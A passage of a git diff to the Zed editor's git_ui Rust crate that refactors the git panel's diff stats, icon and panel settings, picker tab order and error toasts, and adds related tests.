notifications::status_toast::{StatusToast, ToastIcon}; use panel::{PanelHeader, panel_button, panel_filled_button, panel_icon_button}; use project::{ Fs, Project, ProjectPath, - buffer_store::BufferStoreEvent, git_store::{GitStoreEvent, Repository, RepositoryEvent, RepositoryId, pending_op}, project_settings::{GitPathStyle, ProjectSettings}, }; use prompt_store::{BuiltInPrompt, PromptId, PromptStore, RULES_FILE_NAMES}; +use proto::RpcError; use serde::{Deserialize, Serialize}; use settings::{Settings, SettingsStore, StatusStyle}; use smallvec::SmallVec; @@ -64,7 +66,7 @@ use std::ops::Range; use std::path::Path; use std::{sync::Arc, time::Duration, usize}; use strum::{IntoEnumIterator, VariantNames}; -use 
theme::ThemeSettings; +use theme_settings::ThemeSettings; use time::OffsetDateTime; use ui::{ ButtonLike, Checkbox, CommonAnimationExt, ContextMenu, ElevationIndex, IndentGuideColors, @@ -257,7 +259,6 @@ pub enum Event { #[derive(Serialize, Deserialize)] struct SerializedGitPanel { - width: Option, #[serde(default)] amend_pending: bool, #[serde(default)] @@ -532,6 +533,7 @@ pub struct GitStatusEntry { pub(crate) repo_path: RepoPath, pub(crate) status: FileStatus, pub(crate) staging: StageStatus, + pub(crate) diff_stat: Option, } impl GitStatusEntry { @@ -643,7 +645,6 @@ pub struct GitPanel { tracked_count: usize, tracked_staged_count: usize, update_visible_entries_task: Task<()>, - width: Option, pub(crate) workspace: WeakEntity, context_menu: Option<(Entity, Point, Subscription)>, modal_open: bool, @@ -652,8 +653,7 @@ pub struct GitPanel { local_committer_task: Option>, bulk_staging: Option, stash_entries: GitStash, - diff_stats: HashMap, - diff_stats_task: Task<()>, + _settings_subscription: Subscription, } @@ -714,33 +714,44 @@ impl GitPanel { let mut was_sort_by_path = GitPanelSettings::get_global(cx).sort_by_path; let mut was_tree_view = GitPanelSettings::get_global(cx).tree_view; + let mut was_file_icons = GitPanelSettings::get_global(cx).file_icons; + let mut was_folder_icons = GitPanelSettings::get_global(cx).folder_icons; let mut was_diff_stats = GitPanelSettings::get_global(cx).diff_stats; cx.observe_global_in::(window, move |this, window, cx| { - let sort_by_path = GitPanelSettings::get_global(cx).sort_by_path; - let tree_view = GitPanelSettings::get_global(cx).tree_view; - let diff_stats = GitPanelSettings::get_global(cx).diff_stats; + let settings = GitPanelSettings::get_global(cx); + let sort_by_path = settings.sort_by_path; + let tree_view = settings.tree_view; + let file_icons = settings.file_icons; + let folder_icons = settings.folder_icons; + let diff_stats = settings.diff_stats; if tree_view != was_tree_view { this.view_mode = 
GitPanelViewMode::from_settings(cx); } + + let mut update_entries = false; if sort_by_path != was_sort_by_path || tree_view != was_tree_view { this.bulk_staging.take(); + update_entries = true; + } + if (diff_stats != was_diff_stats) || update_entries { this.update_visible_entries(window, cx); } - if diff_stats != was_diff_stats { - if diff_stats { - this.fetch_diff_stats(cx); - } else { - this.diff_stats.clear(); - this.diff_stats_task = Task::ready(()); - cx.notify(); - } + if file_icons != was_file_icons || folder_icons != was_folder_icons { + cx.notify(); } was_sort_by_path = sort_by_path; was_tree_view = tree_view; + was_file_icons = file_icons; + was_folder_icons = folder_icons; was_diff_stats = diff_stats; }) .detach(); + cx.observe_global::(|_, cx| { + cx.notify(); + }) + .detach(); + // just to let us render a placeholder editor. // Once the active git repo is set, this buffer will be replaced. let temporary_buffer = cx.new(|cx| Buffer::local("", cx)); @@ -769,9 +780,7 @@ impl GitPanel { move |this, _git_store, event, window, cx| match event { GitStoreEvent::RepositoryUpdated( _, - RepositoryEvent::StatusesChanged - | RepositoryEvent::BranchChanged - | RepositoryEvent::MergeHeadsChanged, + RepositoryEvent::StatusesChanged | RepositoryEvent::HeadChanged, true, ) | GitStoreEvent::RepositoryAdded @@ -792,33 +801,6 @@ impl GitPanel { ) .detach(); - let buffer_store = project.read(cx).buffer_store().clone(); - - for buffer in project.read(cx).opened_buffers(cx) { - cx.subscribe(&buffer, |this, _buffer, event, cx| { - if matches!(event, BufferEvent::Saved) { - if GitPanelSettings::get_global(cx).diff_stats { - this.fetch_diff_stats(cx); - } - } - }) - .detach(); - } - - cx.subscribe(&buffer_store, |_this, _store, event, cx| { - if let BufferStoreEvent::BufferAdded(buffer) = event { - cx.subscribe(buffer, |this, _buffer, event, cx| { - if matches!(event, BufferEvent::Saved) { - if GitPanelSettings::get_global(cx).diff_stats { - this.fetch_diff_stats(cx); - } - } 
- }) - .detach(); - } - }) - .detach(); - let mut this = Self { active_repository, commit_editor, @@ -849,7 +831,6 @@ impl GitPanel { tracked_count: 0, tracked_staged_count: 0, update_visible_entries_task: Task::ready(()), - width: None, show_placeholders: false, local_committer: None, local_committer_task: None, @@ -859,8 +840,6 @@ impl GitPanel { entry_count: 0, bulk_staging: None, stash_entries: Default::default(), - diff_stats: HashMap::default(), - diff_stats_task: Task::ready(()), _settings_subscription, }; @@ -944,9 +923,9 @@ impl GitPanel { } fn serialize(&mut self, cx: &mut Context) { - let width = self.width; let amend_pending = self.amend_pending; let signoff_enabled = self.signoff_enabled; + let kvp = KeyValueStore::global(cx); self.pending_serialization = cx.spawn(async move |git_panel, cx| { cx.background_executor() @@ -967,16 +946,14 @@ impl GitPanel { }; cx.background_spawn( async move { - KEY_VALUE_STORE - .write_kvp( - serialization_key, - serde_json::to_string(&SerializedGitPanel { - width, - amend_pending, - signoff_enabled, - })?, - ) - .await?; + kvp.write_kvp( + serialization_key, + serde_json::to_string(&SerializedGitPanel { + amend_pending, + signoff_enabled, + })?, + ) + .await?; anyhow::Ok(()) } .log_err(), @@ -994,16 +971,11 @@ impl GitPanel { let mut dispatch_context = KeyContext::new_with_defaults(); dispatch_context.add("GitPanel"); - if window - .focused(cx) - .is_some_and(|focused| self.focus_handle == focused) - { - dispatch_context.add("menu"); - dispatch_context.add("ChangesList"); - } - if self.commit_editor.read(cx).is_focused(window) { dispatch_context.add("CommitEditor"); + } else if self.focus_handle.contains_focused(window, cx) { + dispatch_context.add("menu"); + dispatch_context.add("ChangesList"); } dispatch_context @@ -1152,7 +1124,22 @@ impl GitPanel { } if matches!(self.entries.get(new_index), Some(GitListEntry::Header(..))) { - self.selected_entry = Some(new_index.saturating_sub(1)); + self.selected_entry = match 
&self.view_mode { + GitPanelViewMode::Flat => Some(new_index.saturating_sub(1)), + GitPanelViewMode::Tree(tree_view_state) => { + maybe!({ + let current_logical_index = tree_view_state + .logical_indices + .iter() + .position(|&i| i == new_index)?; + + tree_view_state + .logical_indices + .get(current_logical_index.saturating_sub(1)) + .copied() + }) + } + }; } else { self.selected_entry = Some(new_index); } @@ -1378,6 +1365,7 @@ impl GitPanel { &snapshot, language::Point::new(0, 0), Direction::Next, + true, window, cx, ); @@ -2167,6 +2155,7 @@ impl GitPanel { CommitOptions { amend: false, signoff: self.signoff_enabled, + allow_empty: false, }, window, cx, @@ -2207,6 +2196,7 @@ impl GitPanel { CommitOptions { amend: true, signoff: self.signoff_enabled, + allow_empty: false, }, window, cx, @@ -2279,6 +2269,7 @@ impl GitPanel { RewrapOptions { override_language_settings: false, preserve_existing_whitespace: true, + line_length: None, }, cx, ); @@ -3576,6 +3567,7 @@ impl GitPanel { repo_path: entry.repo_path.clone(), status: entry.status, staging, + diff_stat: entry.diff_stat, }; if staging.has_staged() { @@ -3612,6 +3604,7 @@ impl GitPanel { repo_path: ops.repo_path.clone(), status: status.status, staging: StageStatus::Staged, + diff_stat: status.diff_stat, }); } } @@ -3744,60 +3737,9 @@ impl GitPanel { editor.set_placeholder_text(&placeholder_text, window, cx) }); - if GitPanelSettings::get_global(cx).diff_stats { - self.fetch_diff_stats(cx); - } - cx.notify(); } - fn fetch_diff_stats(&mut self, cx: &mut Context) { - let Some(repo) = self.active_repository.clone() else { - self.diff_stats.clear(); - return; - }; - - let unstaged_rx = repo.update(cx, |repo, cx| repo.diff_stat(DiffType::HeadToWorktree, cx)); - let staged_rx = repo.update(cx, |repo, cx| repo.diff_stat(DiffType::HeadToIndex, cx)); - - self.diff_stats_task = cx.spawn(async move |this, cx| { - let (unstaged_result, staged_result) = - futures::future::join(unstaged_rx, staged_rx).await; - - let mut 
combined = match unstaged_result { - Ok(Ok(stats)) => stats, - Ok(Err(err)) => { - log::warn!("Failed to fetch unstaged diff stats: {err:?}"); - HashMap::default() - } - Err(_) => HashMap::default(), - }; - - let staged = match staged_result { - Ok(Ok(stats)) => Some(stats), - Ok(Err(err)) => { - log::warn!("Failed to fetch staged diff stats: {err:?}"); - None - } - Err(_) => None, - }; - - if let Some(staged) = staged { - for (path, stat) in staged { - let entry = combined.entry(path).or_default(); - entry.added += stat.added; - entry.deleted += stat.deleted; - } - } - - this.update(cx, |this, cx| { - this.diff_stats = combined; - cx.notify(); - }) - .ok(); - }); - } - fn header_state(&self, header_type: Section) -> ToggleState { let (staged_count, count) = match header_type { Section::New => (self.new_staged_count, self.new_count), @@ -4514,7 +4456,11 @@ impl GitPanel { git_panel .update(cx, |git_panel, cx| { git_panel.commit_changes( - CommitOptions { amend, signoff }, + CommitOptions { + amend, + signoff, + allow_empty: false, + }, window, cx, ); @@ -4580,7 +4526,7 @@ impl GitPanel { fn render_previous_commit( &self, - window: &mut Window, + _window: &mut Window, cx: &mut Context, ) -> Option { let active_repository = self.active_repository.as_ref()?; @@ -4665,18 +4611,16 @@ impl GitPanel { ), ) }) - .when(window.is_action_available(&Open, cx), |this| { - this.child( - panel_icon_button("git-graph-button", IconName::GitGraph) - .icon_size(IconSize::Small) - .tooltip(|_window, cx| { - Tooltip::for_action("Open Git Graph", &Open, cx) - }) - .on_click(|_, window, cx| { - window.dispatch_action(Open.boxed_clone(), cx) - }), - ) - }), + .child( + panel_icon_button("git-graph-button", IconName::GitGraph) + .icon_size(IconSize::Small) + .tooltip(|_window, cx| { + Tooltip::for_action("Open Git Graph", &Open, cx) + }) + .on_click(|_, window, cx| { + window.dispatch_action(Open.boxed_clone(), cx) + }), + ), ), ) } @@ -4944,7 +4888,7 @@ impl GitPanel { }), ) 
.custom_scrollbars( - Scrollbars::for_settings::() + Scrollbars::for_settings::() .tracked_scroll_handle(&self.scroll_handle) .with_track_along( ScrollAxes::Horizontal, @@ -5103,15 +5047,21 @@ impl GitPanel { window: &Window, cx: &Context, ) -> AnyElement { - let tree_view = GitPanelSettings::get_global(cx).tree_view; + let settings = GitPanelSettings::get_global(cx); + let tree_view = settings.tree_view; let path_style = self.project.read(cx).path_style(cx); let git_path_style = ProjectSettings::get_global(cx).git.path_style; let display_name = entry.display_name(path_style); let selected = self.selected_entry == Some(ix); let marked = self.marked_entries.contains(&ix); - let status_style = GitPanelSettings::get_global(cx).status_style; + let status_style = settings.status_style; let status = entry.status; + let file_icon = if settings.file_icons { + FileIcons::get_icon(entry.repo_path.as_std_path(), cx) + } else { + None + }; let has_conflict = status.is_conflicted(); let is_modified = status.is_modified(); @@ -5188,7 +5138,24 @@ impl GitPanel { .min_w_0() .flex_1() .gap_1() - .child(git_status_icon(status)) + .when(settings.file_icons, |this| { + this.child( + file_icon + .map(|file_icon| { + Icon::from_path(file_icon) + .size(IconSize::Small) + .color(Color::Muted) + }) + .unwrap_or_else(|| { + Icon::new(IconName::File) + .size(IconSize::Small) + .color(Color::Muted) + }), + ) + }) + .when(status_style != StatusStyle::LabelColor, |el| { + el.child(git_status_icon(status)) + }) .map(|this| { if tree_view { this.pl(px(depth as f32 * TREE_INDENT)).child( @@ -5228,17 +5195,14 @@ impl GitPanel { .active(|s| s.bg(active_bg)) .child(name_row) .when(GitPanelSettings::get_global(cx).diff_stats, |el| { - el.when_some( - self.diff_stats.get(&entry.repo_path).copied(), - move |this, stat| { - let id = format!("diff-stat-{}", id_for_diff_stat); - this.child(ui::DiffStat::new( - id, - stat.added as usize, - stat.deleted as usize, - )) - }, - ) + el.when_some(entry.diff_stat, 
move |this, stat| { + let id = format!("diff-stat-{}", id_for_diff_stat); + this.child(ui::DiffStat::new( + id, + stat.added as usize, + stat.deleted as usize, + )) + }) }) .child( div() @@ -5359,10 +5323,24 @@ impl GitPanel { ) }; - let folder_icon = if entry.expanded { - IconName::FolderOpen + let settings = GitPanelSettings::get_global(cx); + let folder_icon = if settings.folder_icons { + FileIcons::get_folder_icon(entry.expanded, entry.key.path.as_std_path(), cx) + } else { + FileIcons::get_chevron_icon(entry.expanded, cx) + }; + let fallback_folder_icon = if settings.folder_icons { + if entry.expanded { + IconName::FolderOpen + } else { + IconName::Folder + } } else { - IconName::Folder + if entry.expanded { + IconName::ChevronDown + } else { + IconName::ChevronRight + } }; let stage_status = if let Some(repo) = &self.active_repository { @@ -5385,9 +5363,17 @@ impl GitPanel { .gap_1() .pl(px(entry.depth as f32 * TREE_INDENT)) .child( - Icon::new(folder_icon) - .size(IconSize::Small) - .color(Color::Muted), + folder_icon + .map(|folder_icon| { + Icon::from_path(folder_icon) + .size(IconSize::Small) + .color(Color::Muted) + }) + .unwrap_or_else(|| { + Icon::new(fallback_folder_icon) + .size(IconSize::Small) + .color(Color::Muted) + }), ) .child(self.entry_label(entry.name.clone(), label_color).truncate()); @@ -5554,12 +5540,14 @@ impl GitPanel { mut cx: AsyncWindowContext, ) -> anyhow::Result> { let serialized_panel = match workspace - .read_with(&cx, |workspace, _| Self::serialization_key(workspace)) + .read_with(&cx, |workspace, cx| { + Self::serialization_key(workspace).map(|key| (key, KeyValueStore::global(cx))) + }) .ok() .flatten() { - Some(serialization_key) => cx - .background_spawn(async move { KEY_VALUE_STORE.read_kvp(&serialization_key) }) + Some((serialization_key, kvp)) => cx + .background_spawn(async move { kvp.read_kvp(&serialization_key) }) .await .context("loading git panel") .log_err() @@ -5576,7 +5564,6 @@ impl GitPanel { if let 
Some(serialized_panel) = serialized_panel { panel.update(cx, |panel, cx| { - panel.width = serialized_panel.width; panel.amend_pending = serialized_panel.amend_pending; panel.signoff_enabled = serialized_panel.signoff_enabled; cx.notify(); @@ -5630,6 +5617,21 @@ impl GitPanel { } } +#[cfg(any(test, feature = "test-support"))] +impl GitPanel { + pub fn new_test( + workspace: &mut Workspace, + window: &mut Window, + cx: &mut Context, + ) -> Entity { + Self::new(workspace, window, cx) + } + + pub fn active_repository(&self) -> Option<&Entity> { + self.active_repository.as_ref() + } +} + impl Render for GitPanel { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { let project = self.project.read(cx); @@ -5756,11 +5758,12 @@ impl editor::Addon for GitPanelAddon { fn render_buffer_header_controls( &self, - excerpt_info: &ExcerptInfo, + _excerpt_info: &ExcerptBoundaryInfo, + buffer: &language::BufferSnapshot, window: &Window, cx: &App, ) -> Option { - let file = excerpt_info.buffer.file()?; + let file = buffer.file()?; let git_panel = self.workspace.upgrade()?.read(cx).panel::(cx)?; git_panel @@ -5792,15 +5795,8 @@ impl Panel for GitPanel { }); } - fn size(&self, _: &Window, cx: &App) -> Pixels { - self.width - .unwrap_or_else(|| GitPanelSettings::get_global(cx).default_width) - } - - fn set_size(&mut self, size: Option, _: &mut Window, cx: &mut Context) { - self.width = size; - self.serialize(cx); - cx.notify(); + fn default_size(&self, _: &Window, cx: &App) -> Pixels { + GitPanelSettings::get_global(cx).default_width } fn icon(&self, _: &Window, cx: &App) -> Option { @@ -5811,12 +5807,24 @@ impl Panel for GitPanel { Some("Git Panel") } + fn icon_label(&self, _: &Window, cx: &App) -> Option { + if !GitPanelSettings::get_global(cx).show_count_badge { + return None; + } + let total = self.changes_count; + (total > 0).then(|| total.to_string()) + } + fn toggle_action(&self) -> Box { Box::new(ToggleFocus) } + fn starts_open(&self, _: &Window, 
cx: &App) -> bool { + GitPanelSettings::get_global(cx).starts_open + } + fn activation_priority(&self) -> u32 { - 2 + 3 } } @@ -6424,7 +6432,7 @@ pub(crate) fn show_error_toast( cx: &mut App, ) { let action = action.into(); - let message = e.to_string().trim().to_string(); + let message = format_git_error_toast_message(&e); if message .matches(git::repository::REMOTE_CANCELLED_BY_USER) .next() @@ -6450,13 +6458,27 @@ pub(crate) fn show_error_toast( } } +fn rpc_error_raw_message_from_chain(error: &anyhow::Error) -> Option<&str> { + error + .chain() + .find_map(|cause| cause.downcast_ref::().map(RpcError::raw_message)) +} + +fn format_git_error_toast_message(error: &anyhow::Error) -> String { + if let Some(message) = rpc_error_raw_message_from_chain(error) { + message.trim().to_string() + } else { + error.to_string().trim().to_string() + } +} + #[cfg(test)] mod tests { use git::{ repository::repo_path, status::{StatusCode, UnmergedStatus, UnmergedStatusCode}, }; - use gpui::{TestAppContext, UpdateGlobal, VisualTestContext}; + use gpui::{TestAppContext, UpdateGlobal, VisualTestContext, px}; use indoc::indoc; use project::FakeFs; use serde_json::json; @@ -6475,12 +6497,53 @@ mod tests { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(LoadThemes::JustBase, cx); + theme_settings::init(LoadThemes::JustBase, cx); editor::init(cx); crate::init(cx); }); } + #[test] + fn test_format_git_error_toast_message_prefers_raw_rpc_message() { + let rpc_error = RpcError::from_proto( + &proto::Error { + message: + "Your local changes to the following files would be overwritten by merge\n" + .to_string(), + code: proto::ErrorCode::Internal as i32, + tags: Default::default(), + }, + "Pull", + ); + + let message = format_git_error_toast_message(&rpc_error); + assert_eq!( + message, + "Your local changes to the following files would be overwritten by merge" + ); + } + + #[test] + fn 
test_format_git_error_toast_message_prefers_raw_rpc_message_when_wrapped() { + let rpc_error = RpcError::from_proto( + &proto::Error { + message: + "Your local changes to the following files would be overwritten by merge\n" + .to_string(), + code: proto::ErrorCode::Internal as i32, + tags: Default::default(), + }, + "Pull", + ); + let wrapped = rpc_error.context("sending pull request"); + + let message = format_git_error_toast_message(&wrapped); + assert_eq!( + message, + "Your local changes to the following files would be overwritten by merge" + ); + } + #[gpui::test] async fn test_entry_worktree_paths(cx: &mut TestAppContext) { init_test(cx); @@ -6554,11 +6617,19 @@ mod tests { repo_path: repo_path("crates/gpui/gpui.rs"), status: StatusCode::Modified.worktree(), staging: StageStatus::Unstaged, + diff_stat: Some(DiffStat { + added: 1, + deleted: 1, + }), }), GitListEntry::Status(GitStatusEntry { repo_path: repo_path("crates/util/util.rs"), status: StatusCode::Modified.worktree(), staging: StageStatus::Unstaged, + diff_stat: Some(DiffStat { + added: 1, + deleted: 1, + }), },), ], ); @@ -6579,11 +6650,19 @@ mod tests { repo_path: repo_path("crates/gpui/gpui.rs"), status: StatusCode::Modified.worktree(), staging: StageStatus::Unstaged, + diff_stat: Some(DiffStat { + added: 1, + deleted: 1, + }), }), GitListEntry::Status(GitStatusEntry { repo_path: repo_path("crates/util/util.rs"), status: StatusCode::Modified.worktree(), staging: StageStatus::Unstaged, + diff_stat: Some(DiffStat { + added: 1, + deleted: 1, + }), },), ], ); @@ -7785,4 +7864,133 @@ mod tests { let message = panel.update(cx, |panel, cx| panel.suggest_commit_message(cx)); assert_eq!(message, Some("Update tracked".to_string())); } + + #[gpui::test] + async fn test_dispatch_context_with_focus_states(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.background_executor.clone()); + fs.insert_tree( + path!("/project"), + json!({ + ".git": {}, + "tracked": "tracked\n", + }), + ) + .await; 
+ + fs.set_head_and_index_for_repo( + path!("/project/.git").as_ref(), + &[("tracked", "old tracked\n".into())], + ); + + let project = Project::test(fs.clone(), [Path::new(path!("/project"))], cx).await; + let window_handle = + cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window_handle + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window_handle.into(), cx); + let panel = workspace.update_in(cx, GitPanel::new); + + let handle = cx.update_window_entity(&panel, |panel, _, _| { + std::mem::replace(&mut panel.update_visible_entries_task, Task::ready(())) + }); + cx.executor().advance_clock(2 * UPDATE_DEBOUNCE); + handle.await; + + // Case 1: Focus the commit editor — should have "CommitEditor" but NOT "menu"/"ChangesList" + panel.update_in(cx, |panel, window, cx| { + panel.focus_editor(&FocusEditor, window, cx); + let editor_is_focused = panel.commit_editor.read(cx).is_focused(window); + assert!( + editor_is_focused, + "commit editor should be focused after focus_editor action" + ); + let context = panel.dispatch_context(window, cx); + assert!( + context.contains("GitPanel"), + "should always have GitPanel context" + ); + assert!( + context.contains("CommitEditor"), + "should have CommitEditor context when commit editor is focused" + ); + assert!( + !context.contains("menu"), + "should not have menu context when commit editor is focused" + ); + assert!( + !context.contains("ChangesList"), + "should not have ChangesList context when commit editor is focused" + ); + }); + + // Case 2: Focus the panel's focus handle directly — should have "menu" and "ChangesList". + // We force a draw via simulate_resize to ensure the dispatch tree is populated, + // since contains_focused() depends on the rendered dispatch tree. 
+ panel.update_in(cx, |panel, window, cx| { + panel.focus_handle.focus(window, cx); + }); + cx.simulate_resize(gpui::size(px(800.), px(600.))); + + panel.update_in(cx, |panel, window, cx| { + let context = panel.dispatch_context(window, cx); + assert!( + context.contains("GitPanel"), + "should always have GitPanel context" + ); + assert!( + context.contains("menu"), + "should have menu context when changes list is focused" + ); + assert!( + context.contains("ChangesList"), + "should have ChangesList context when changes list is focused" + ); + assert!( + !context.contains("CommitEditor"), + "should not have CommitEditor context when changes list is focused" + ); + }); + + // Case 3: Switch back to commit editor and verify context switches correctly + panel.update_in(cx, |panel, window, cx| { + panel.focus_editor(&FocusEditor, window, cx); + }); + + panel.update_in(cx, |panel, window, cx| { + let context = panel.dispatch_context(window, cx); + assert!( + context.contains("CommitEditor"), + "should have CommitEditor after switching focus back to editor" + ); + assert!( + !context.contains("menu"), + "should not have menu after switching focus back to editor" + ); + }); + + // Case 4: Re-focus changes list and verify it transitions back correctly + panel.update_in(cx, |panel, window, cx| { + panel.focus_handle.focus(window, cx); + }); + cx.simulate_resize(gpui::size(px(800.), px(600.))); + + panel.update_in(cx, |panel, window, cx| { + assert!( + panel.focus_handle.contains_focused(window, cx), + "panel focus handle should report contains_focused when directly focused" + ); + let context = panel.dispatch_context(window, cx); + assert!( + context.contains("menu"), + "should have menu context after re-focusing changes list" + ); + assert!( + context.contains("ChangesList"), + "should have ChangesList context after re-focusing changes list" + ); + }); + } } diff --git a/crates/git_ui/src/git_panel_settings.rs b/crates/git_ui/src/git_panel_settings.rs index 
2a7480de355a6190494211d823e4aa440d191371..9ccbced249db6707f1b5bca609f5dddea47bbd6a 100644 --- a/crates/git_ui/src/git_panel_settings.rs +++ b/crates/git_ui/src/git_panel_settings.rs @@ -1,4 +1,4 @@ -use editor::EditorSettings; +use editor::{EditorSettings, ui_scrollbar_settings_from_raw}; use gpui::Pixels; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; @@ -20,15 +20,22 @@ pub struct GitPanelSettings { pub dock: DockPosition, pub default_width: Pixels, pub status_style: StatusStyle, + pub file_icons: bool, + pub folder_icons: bool, pub scrollbar: ScrollbarSettings, pub fallback_branch_name: String, pub sort_by_path: bool, pub collapse_untracked_diff: bool, pub tree_view: bool, pub diff_stats: bool, + pub show_count_badge: bool, + pub starts_open: bool, } -impl ScrollbarVisibility for GitPanelSettings { +#[derive(Default)] +pub(crate) struct GitPanelScrollbarAccessor; + +impl ScrollbarVisibility for GitPanelScrollbarAccessor { fn visibility(&self, cx: &ui::App) -> ShowScrollbar { // TODO: This PR should have defined Editor's `scrollbar.axis` // as an Option, not a ScrollbarAxes as it would allow you to @@ -38,7 +45,8 @@ impl ScrollbarVisibility for GitPanelSettings { // so we can show each axis based on the settings. // // We should fix this. 
PR: https://github.com/zed-industries/zed/pull/19495 - self.scrollbar + GitPanelSettings::get_global(cx) + .scrollbar .show .unwrap_or_else(|| EditorSettings::get_global(cx).scrollbar.show) } @@ -52,14 +60,22 @@ impl Settings for GitPanelSettings { dock: git_panel.dock.unwrap().into(), default_width: px(git_panel.default_width.unwrap()), status_style: git_panel.status_style.unwrap(), + file_icons: git_panel.file_icons.unwrap(), + folder_icons: git_panel.folder_icons.unwrap(), scrollbar: ScrollbarSettings { - show: git_panel.scrollbar.unwrap().show.map(Into::into), + show: git_panel + .scrollbar + .unwrap() + .show + .map(ui_scrollbar_settings_from_raw), }, fallback_branch_name: git_panel.fallback_branch_name.unwrap(), sort_by_path: git_panel.sort_by_path.unwrap(), collapse_untracked_diff: git_panel.collapse_untracked_diff.unwrap(), tree_view: git_panel.tree_view.unwrap(), diff_stats: git_panel.diff_stats.unwrap(), + show_count_badge: git_panel.show_count_badge.unwrap(), + starts_open: git_panel.starts_open.unwrap(), } } } diff --git a/crates/git_ui/src/git_picker.rs b/crates/git_ui/src/git_picker.rs index 82ef9c9516b7c145edbf26d6c5b8927189525cab..bf9d122a7ec16b11c56fc45f59ff8c5f85f7fded 100644 --- a/crates/git_ui/src/git_picker.rs +++ b/crates/git_ui/src/git_picker.rs @@ -15,7 +15,7 @@ use workspace::{ModalView, Workspace, pane}; use crate::branch_picker::{self, BranchList, DeleteBranch, FilterRemotes}; use crate::stash_picker::{self, DropStashItem, ShowStashItem, StashList}; use crate::worktree_picker::{ - self, WorktreeFromDefault, WorktreeFromDefaultOnWindow, WorktreeList, + self, DeleteWorktree, WorktreeFromDefault, WorktreeFromDefaultOnWindow, WorktreeList, }; actions!( @@ -25,8 +25,8 @@ actions!( #[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] pub enum GitPickerTab { - Branches, Worktrees, + Branches, Stash, } @@ -190,9 +190,9 @@ impl GitPicker { fn activate_next_tab(&mut self, window: &mut Window, cx: &mut Context) { self.tab = match self.tab { - 
GitPickerTab::Branches => GitPickerTab::Worktrees, - GitPickerTab::Worktrees => GitPickerTab::Stash, - GitPickerTab::Stash => GitPickerTab::Branches, + GitPickerTab::Worktrees => GitPickerTab::Branches, + GitPickerTab::Branches => GitPickerTab::Stash, + GitPickerTab::Stash => GitPickerTab::Worktrees, }; self.ensure_active_picker(window, cx); self.focus_active_picker(window, cx); @@ -201,9 +201,9 @@ impl GitPicker { fn activate_previous_tab(&mut self, window: &mut Window, cx: &mut Context) { self.tab = match self.tab { - GitPickerTab::Branches => GitPickerTab::Stash, - GitPickerTab::Worktrees => GitPickerTab::Branches, - GitPickerTab::Stash => GitPickerTab::Worktrees, + GitPickerTab::Worktrees => GitPickerTab::Stash, + GitPickerTab::Branches => GitPickerTab::Worktrees, + GitPickerTab::Stash => GitPickerTab::Branches, }; self.ensure_active_picker(window, cx); self.focus_active_picker(window, cx); @@ -241,9 +241,9 @@ impl GitPicker { "git-picker-tabs", [ ToggleButtonSimple::new( - GitPickerTab::Branches.to_string(), + GitPickerTab::Worktrees.to_string(), cx.listener(|this, _, window, cx| { - this.tab = GitPickerTab::Branches; + this.tab = GitPickerTab::Worktrees; this.ensure_active_picker(window, cx); this.focus_active_picker(window, cx); cx.notify(); @@ -251,16 +251,16 @@ impl GitPicker { ) .tooltip(move |_, cx| { Tooltip::for_action_in( - "Toggle Branch Picker", - &ActivateBranchesTab, - &branches_focus_handle, + "Toggle Worktree Picker", + &ActivateWorktreesTab, + &worktrees_focus_handle, cx, ) }), ToggleButtonSimple::new( - GitPickerTab::Worktrees.to_string(), + GitPickerTab::Branches.to_string(), cx.listener(|this, _, window, cx| { - this.tab = GitPickerTab::Worktrees; + this.tab = GitPickerTab::Branches; this.ensure_active_picker(window, cx); this.focus_active_picker(window, cx); cx.notify(); @@ -268,9 +268,9 @@ impl GitPicker { ) .tooltip(move |_, cx| { Tooltip::for_action_in( - "Toggle Worktree Picker", - &ActivateWorktreesTab, - &worktrees_focus_handle, + 
"Toggle Branch Picker", + &ActivateBranchesTab, + &branches_focus_handle, cx, ) }), @@ -297,8 +297,8 @@ impl GitPicker { .style(ToggleButtonGroupStyle::Outlined) .auto_width() .selected_index(match self.tab { - GitPickerTab::Branches => 0, - GitPickerTab::Worktrees => 1, + GitPickerTab::Worktrees => 0, + GitPickerTab::Branches => 1, GitPickerTab::Stash => 2, }), ) @@ -408,6 +408,19 @@ impl GitPicker { } } + fn handle_worktree_delete( + &mut self, + _: &DeleteWorktree, + window: &mut Window, + cx: &mut Context, + ) { + if let Some(worktree_list) = &self.worktree_list { + worktree_list.update(cx, |list, cx| { + list.handle_delete(&DeleteWorktree, window, cx); + }); + } + } + fn handle_drop_stash( &mut self, _: &DropStashItem, @@ -524,6 +537,7 @@ impl Render for GitPicker { .when(self.tab == GitPickerTab::Worktrees, |el| { el.on_action(cx.listener(Self::handle_worktree_from_default)) .on_action(cx.listener(Self::handle_worktree_from_default_on_window)) + .on_action(cx.listener(Self::handle_worktree_delete)) }) .when(self.tab == GitPickerTab::Stash, |el| { el.on_action(cx.listener(Self::handle_drop_stash)) diff --git a/crates/git_ui/src/git_ui.rs b/crates/git_ui/src/git_ui.rs index 76ea0f9797972186f358c67617ba6388e8530357..4e6669823a9d8f78c3c6113906d6b927c3f1fc70 100644 --- a/crates/git_ui/src/git_ui.rs +++ b/crates/git_ui/src/git_ui.rs @@ -46,6 +46,8 @@ pub mod stash_picker; pub mod text_diff_view; pub mod worktree_picker; +pub use conflict_view::MergeConflictIndicator; + pub fn init(cx: &mut App) { editor::set_blame_renderer(blame_ui::GitBlameRenderer, cx); commit_view::init(cx); @@ -258,11 +260,12 @@ pub fn resolve_active_repository(workspace: &Workspace, cx: &App) -> Option Option> { + fn breadcrumbs(&self, cx: &App) -> Option<(Vec, Option)> { self.editor.breadcrumbs(cx) } diff --git a/crates/git_ui/src/project_diff.rs b/crates/git_ui/src/project_diff.rs index f62b08e4c0d99db7d2e60e6aac730a69b139cca3..8fa4680593a7565c84efd7503f6cf9d188d3be35 100644 --- 
